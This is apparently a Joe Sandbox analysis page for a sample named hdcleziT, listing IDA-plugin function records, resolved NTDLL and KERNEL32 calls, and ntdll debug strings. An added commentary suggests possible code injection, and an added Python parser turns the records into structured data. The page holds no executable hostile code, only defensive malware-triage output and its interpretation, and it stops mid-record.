                                                                                                    • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                                    • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 1c56783c921d175f6924bd65688631a727c1e4b9dcb49df4808649c9836e1e4c
                                                                                                    • Instruction ID: de82eccf7ae631377d231d63f66a576cca8d3b4f3198ee97b50534f793839dc0
                                                                                                    • Opcode Fuzzy Hash: 1c56783c921d175f6924bd65688631a727c1e4b9dcb49df4808649c9836e1e4c
                                                                                                    • Instruction Fuzzy Hash: 5B90023524588842D2107158844474A00155BD0305F59D415B4425768D8695C9917121
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 051dac382a95e99ea5e2441a02543fde4283e54d3eb941535f4f0d1d17d75739
                                                                                                    • Instruction ID: 3d52531d4628f6d8e93704b6768656c10b0b6611db8b27de814227e02afbc379
                                                                                                    • Opcode Fuzzy Hash: 051dac382a95e99ea5e2441a02543fde4283e54d3eb941535f4f0d1d17d75739
                                                                                                    • Instruction Fuzzy Hash: 2590023524580453D2117158454470700195BD0345F95D416B0425768D9656CA52A121

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 172 24cf2b60-24cf2b6c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: b668dd1abd96606e7d1939c8a11aec16607f504faabf94bca1680fa908cb735f
                                                                                                    • Instruction ID: 86744fdbec1bbdbc0bd762edd21adee48915cabeef7addf34d1fbdd85e75b451
                                                                                                    • Opcode Fuzzy Hash: b668dd1abd96606e7d1939c8a11aec16607f504faabf94bca1680fa908cb735f
                                                                                                    • Instruction Fuzzy Hash: 3B90026524680043420571584454616401A5BE0305B55D025F10157A0DC525C9916125
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: bb6c7eba7a0d620bd2301035e4c7cc2da0d74be4e9485d79e4e6bcd4788087aa
                                                                                                    • Instruction ID: 4d45a2ed991481219b4da12e8811d0e6076ca8e668870cbc04e0391e2a8a04a9
                                                                                                    • Opcode Fuzzy Hash: bb6c7eba7a0d620bd2301035e4c7cc2da0d74be4e9485d79e4e6bcd4788087aa
                                                                                                    • Instruction Fuzzy Hash: DB90023564990442D2007158455470610155BD0305F65D415B0425778D8795CA5165A2

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 0j0OId92L$0j0OId92L
                                                                                                    • API String ID: 1836367815-695469284
                                                                                                    • Opcode ID: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                                    • Instruction ID: 395257a172b6fb01821a03ae621abc39386921b5435d80e57e368608866d07a4
                                                                                                    • Opcode Fuzzy Hash: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                                    • Instruction Fuzzy Hash: 0801C471E41218B6EB21A7D2DD02FDF7B78DF81B14F00806AFA047B180D7B856468BE9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 0j0OId92L$0j0OId92L
                                                                                                    • API String ID: 1836367815-695469284
                                                                                                    • Opcode ID: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                                    • Instruction ID: ae0f3591e816a9f46982110179c6327102946865d15a57d5eabb58516dd05135
                                                                                                    • Opcode Fuzzy Hash: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                                    • Instruction Fuzzy Hash: E601DB71E4021876DB11A6D29C02FDF7B7C9F41B14F04806AFA047B2C1D6B856068BE9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    APIs
                                                                                                    • EntryPoint.HDCLEZIT(?,0000032C,?), ref: 00401BFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EntryPoint
                                                                                                    • String ID: a```
                                                                                                    • API String ID: 3225343992-3259403941
                                                                                                    • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                                    • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                                                    • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                                    • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84

Control-flow Graph (node list: id start-end [call addr | API]; edges: src->dst):
control_flow_graph 54 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
Strings
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: whA
• API String ID: 3298025750-33568622
• Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
• Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
• Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
• Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9

Control-flow Graph (node list: id start-end [call addr | API]; edges: src->dst):
control_flow_graph 98 417bb3-417bc4 99 417b81-417b83 98->99 100 417bc6-417bd3 98->100 101 417b89-417b91 99->101 102 417b84 call 42e263 99->102 103 417bd5-417bd6 100->103 104 417bd7-417bde 100->104 105 417b93-417ba7 LdrLoadDll 101->105 106 417baa-417bad 101->106 102->101 103->104 107 417be1-417be7 104->107 105->106 108 417be9 107->108 109 417bed-417bf5 107->109 111 417bea 108->111 112 417c5f-417c64 108->112 110 417bfa-417c03 109->110 114 417c41-417c55 110->114 111->110 116 417beb-417bec 111->116 112->114 115 417c66-417c6f 112->115 114->107 117 417c57-417c58 114->117 118 417c71-417c91 115->118 116->109 117->118 119 417c5a-417c5e 117->119 119->112
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
• Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
• Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
• Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5

Control-flow Graph (node list: id start-end [call addr | API]; edges: src->dst):
control_flow_graph 135 417b27-417b30 136 417b90-417ba7 LdrLoadDll 135->136 137 417b32-417b5c call 42f7c3 135->137 138 417baa-417bad 136->138 142 417b62-417b70 call 42fdc3 137->142 143 417b5e-417b61 137->143 146 417b80-417b91 call 42e263 142->146 147 417b72-417b7d call 430063 142->147 146->138 152 417b93-417ba7 LdrLoadDll 146->152 147->146 152->138
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
• Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
• Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
• Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756

Control-flow Graph (node list: id start-end [call addr | API]; edges: src->dst):
control_flow_graph 153 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
• Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
• Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
• Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9

Control-flow Graph (node list: id start-end [call addr | API]; edges: src->dst):
control_flow_graph 163 42cec3-42ceff call 404973 call 42dd63 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,43F334D9,?,?,43F334D9), ref: 0042CEFA
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
• Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
• Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
• Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4

Control-flow Graph (node list: id start-end [call addr | API]; edges: src->dst):
control_flow_graph 168 24cf2c0a-24cf2c0f 169 24cf2c1f-24cf2c26 LdrInitializeThunk 168->169 170 24cf2c11-24cf2c18 168->170
APIs
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ebfee78e2707d888e9f4cf043ca152cf2b2f55722ebed71b7a38f846ae232ace
• Instruction ID: 3e015402ffb24f1a720d62b6f31a4146f9dde99ca73fb939c5dea555fbf289ee
• Opcode Fuzzy Hash: ebfee78e2707d888e9f4cf043ca152cf2b2f55722ebed71b7a38f846ae232ace
• Instruction Fuzzy Hash: CEB092769469C5CAEB42E7644A08B0B7A11BBD0705F2BC066E2030B92F473DC2D1E2B6

Strings
• The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 24D68E86
• *** Critical Section Timeout (%p) in %ws:%s, xrefs: 24D68E4B
• *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 24D68D8C
• read from, xrefs: 24D68F5D, 24D68F62
• *** Resource timeout (%p) in %ws:%s, xrefs: 24D68E02
• This failed because of error %Ix., xrefs: 24D68EF6
• The instruction at %p referenced memory at %p., xrefs: 24D68EE2
• This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 24D68F2D
• The instruction at %p tried to %s , xrefs: 24D68F66
• This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 24D68DB5
• *** enter .cxr %p for the context, xrefs: 24D68FBD
• *** Inpage error in %ws:%s, xrefs: 24D68EC8
• The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 24D68DD3
• The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 24D68E3F
• *** A stack buffer overrun occurred in %ws:%s, xrefs: 24D68DA3
• <unknown>, xrefs: 24D68D2E, 24D68D81, 24D68E00, 24D68E49, 24D68EC7, 24D68F3E
• *** then kb to get the faulting stack, xrefs: 24D68FCC
• The critical section is owned by thread %p., xrefs: 24D68E69
• The resource is owned shared by %d threads, xrefs: 24D68E2E
• This means that the I/O device reported an I/O error. Check your hardware., xrefs: 24D68F26
• *** An Access Violation occurred in %ws:%s, xrefs: 24D68F3F
• Go determine why that thread has not released the critical section., xrefs: 24D68E75
• write to, xrefs: 24D68F56
• *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 24D68FEF
• *** enter .exr %p for the exception record, xrefs: 24D68FA1
• an invalid address, %p, xrefs: 24D68F7F
• This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 24D68F34
• If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 24D68DC4
• a NULL pointer, xrefs: 24D68F90
• The resource is owned exclusively by thread %p, xrefs: 24D68E24
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
• API String ID: 0-108210295
• Opcode ID: f2075ee34315226ddf99caf9cea213b4d2ea6be53c010b107ad33372e3746f13
• Instruction ID: fa176e70b79c3fb8ae70c123dc6c69074a0daa8bbab2be940624a02d15f964b9
• Opcode Fuzzy Hash: f2075ee34315226ddf99caf9cea213b4d2ea6be53c010b107ad33372e3746f13
• Instruction Fuzzy Hash: A881C079A41125FFDB11CF19ACA4D6B3F36AB66714B01008DF50AAF22AE3758521CE72

Strings
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 0373de3ae19911b46482f5c7b44bb8596fb952a4f7e967df81e0c71e5fb5bb94
• Instruction ID: 33b2db4834b6cc1586a5642d99e90ba1f4cfe6d1868aea19464955af52be3dad
• Opcode Fuzzy Hash: 0373de3ae19911b46482f5c7b44bb8596fb952a4f7e967df81e0c71e5fb5bb94
• Instruction Fuzzy Hash: 08924A71A08781AFE721CF25C880B5BBBE9BB84754F00492DFA94DB291D774E944CF92
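The function records above are Joe Sandbox IDA-plugin output: a control_flow_graph line of numbered basic blocks with their address ranges, internal call targets and API names, an APIs list of resolved imports with the module they were resolved from and the call site, and the dump region the code was lifted from. Read as a whole they say more than any single record: the heap and loader calls of the 0x400000 image are resolved straight from NTDLL rather than through kernel32 wrappers, and the records come from two PE-backed regions, the image at 0x400000 and a second region at 0x24C80000 whose strings (minkernel\ntdll\ldrinit.c, LdrpInitializeExecutionOptions) are ntdll's own, i.e. a second copy of ntdll inside the process. Treat that second copy as a lead to confirm in the dump, not as a finding the report states. The parser below is an added example, not Joe Sandbox code; its sample input is three records copied from this page with the indentation stripped (the executed/not-executed colouring of the rendered graph does not survive in text), and the function and field names are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data.
Added example; not part of the Joe Sandbox report or its tooling."""
import re
from collections import defaultdict

# Constructed sample: three records copied from the report above, indentation
# stripped. Each record ends at its "Instruction Fuzzy Hash" line.
SAMPLE = """\
control_flow_graph 28 401af2-401b18 29 401b20-401b33 28->29 29->29 30 401b35-401b51 call 4010e0 29->30 33 401b56-401b5c 30->33 33->33 34 401b5e-401b82 call 401d70 33->34 37 401b87-401b8d 34->37 37->37 38 401b8f-401b9e 37->38 39 401ba3-401ba4 38->39 39->39 40 401ba6-401bab 39->40 41 401bb0-401bc1 40->41 41->41 42 401bc3-401bd8 41->42 42->42 43 401bda-401bdf 42->43 44 401be0-401bf1 43->44 44->44 45 401bf3-401c19 EntryPoint 44->45 46 401c20-401c26 45->46 46->46 47 401c28 call 430153 46->47 48 401c2a-401c2d 47->48 49 401c32-401c45 48->49 49->49 50 401c47-401c4c 49->50 51 401c50-401c61 50->51 51->51 52 401c63-401c78 51->52
APIs
• EntryPoint.HDCLEZIT(?,0000032C,?), ref: 00401BFF
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84
control_flow_graph 54 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
Memory Dump Source
• Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9
control_flow_graph 168 24cf2c0a-24cf2c0f 169 24cf2c1f-24cf2c26 LdrInitializeThunk 168->169 170 24cf2c11-24cf2c18 168->170
APIs
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
• Instruction Fuzzy Hash: CEB092769469C5CAEB42E7644A08B0B7A11BBD0705F2BC066E2030B92F473DC2D1E2B6
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (\w+)")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(line):
    """Turn one 'control_flow_graph ...' line into nodes and edges.
    '<id> <start>[-<end>]' opens a node; 'call <hex>' and bare API names
    attach to the most recently opened node; '<a>-><b>' is an edge."""
    nodes, edges = {}, []
    toks = line.split()[1:]  # drop the 'control_flow_graph' keyword
    cur, i = None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif t == "call":
            nodes[cur]["calls"].append(int(toks[i + 1], 16))
            i += 1
        elif t.isdigit():  # decimal node id; the next token is its address range
            cur = int(t)
            lo, _, hi = toks[i + 1].partition("-")
            nodes[cur] = {"start": int(lo, 16), "end": int(hi or lo, 16),
                          "calls": [], "apis": []}
            i += 1
        else:  # anything else is an API name the plugin placed on the node
            nodes[cur]["apis"].append(t)
        i += 1
    return nodes, edges


def parse_records(text):
    """Split report text into per-function records and extract the graph,
    the resolved API references and the memory-dump region of each."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if rec is None:
            rec = {"nodes": {}, "edges": [], "apis": [], "source": None, "fuzzy": None}
        if line.startswith("control_flow_graph"):
            rec["nodes"], rec["edges"] = parse_cfg(line)
        elif (m := API_RE.match(line)):
            rec["apis"].append({"name": m.group(1), "module": m.group(2),
                                "args": m.group(3).split(","), "ref": int(m.group(4), 16)})
        elif (m := SRC_RE.search(line)):
            rec["source"] = {"file": m.group(1), "base": int(m.group(2), 16),
                             "pe": m.group(3) == "true"}
        elif line.startswith("• Instruction Fuzzy Hash:"):
            rec["fuzzy"] = line.split(":", 1)[1].strip()
            records.append(rec)
            rec = None
    return records


def entry_address(rec):
    """Lowest block start: the function's entry in the dump's address space."""
    return min(n["start"] for n in rec["nodes"].values()) if rec["nodes"] else None


def self_loops(rec):
    """Blocks that branch back to themselves: tight loops (string ops, decode loops)."""
    return sorted(a for a, b in rec["edges"] if a == b)


def api_summary(records):
    """Each resolved API -> [(module it was resolved from, call-site address)]."""
    out = defaultdict(list)
    for rec in records:
        for a in rec["apis"]:
            out[a["name"]].append((a["module"], a["ref"]))
    return dict(out)


def regions(records):
    """Distinct (dump base, PE-backed) regions the functions were lifted from."""
    return sorted({(r["source"]["base"], r["source"]["pe"]) for r in records if r["source"]})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(f"fn {entry_address(rec):#x} base={rec['source']['base']:#x} "
              f"blocks={len(rec['nodes'])} edges={len(rec['edges'])} "
              f"loops={self_loops(rec)} apis={[(a['name'], a['module']) for a in rec['apis']]}")
    print("regions:", [f"{b:#x}" for b, _ in regions(recs)])
```

Feed it the whole page (indentation is ignored) and group by `regions()` and `api_summary()` to separate the injected image's functions from the ntdll-like region's, and to list which imports are reached through NTDLL versus KERNEL32.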

Strings
• Critical section address, xrefs: 24D25425, 24D254BC, 24D25534
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 24D254CE
• double initialized or corrupted critical section, xrefs: 24D25508
• 8, xrefs: 24D252E3
• Critical section address., xrefs: 24D25502
• Address of the debug info found in the active list., xrefs: 24D254AE, 24D254FA
• corrupted critical section, xrefs: 24D254C2
• Critical section debug info address, xrefs: 24D2541F, 24D2552E
• Thread is in a state in which it cannot own a critical section, xrefs: 24D25543
• undeleted critical section in freed memory, xrefs: 24D2542B
• Thread identifier, xrefs: 24D2553A
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 24D254E2
• Invalid debug info address of this critical section, xrefs: 24D254B6
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 24D2540A, 24D25496, 24D25519
Memory Dump Source
• Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: f74c92131695ad3c3c06def476e1f8919a125c701c31dc6bd8a5681be2262bb1
• Instruction ID: 1b6aa38a08ab20ae15facf597f3fd63ed9962c43c36e528558a8c2d6c0a5a28b
• Opcode Fuzzy Hash: f74c92131695ad3c3c06def476e1f8919a125c701c31dc6bd8a5681be2262bb1
                                                                                                    • Instruction Fuzzy Hash: 87818971A04658FFEB10CF99C8A4FAEBBFABB08714F104159E508BB285D375A941CB60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                    • API String ID: 0-3197712848
                                                                                                    • Opcode ID: 50635fd8c740b517c34ede7f728f4b3bf15e8f8978a828ad6f56de5068cb6271
                                                                                                    • Instruction ID: 4ed4a2f02b275fb2a51425b0817005cab19c36038a894772e577ea71661b7a51
                                                                                                    • Opcode Fuzzy Hash: 50635fd8c740b517c34ede7f728f4b3bf15e8f8978a828ad6f56de5068cb6271
                                                                                                    • Instruction Fuzzy Hash: FD12D0B1A09351DFD321CF29C894BAAB7E2FF84704F04095DF9899B291E735DA44CB92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
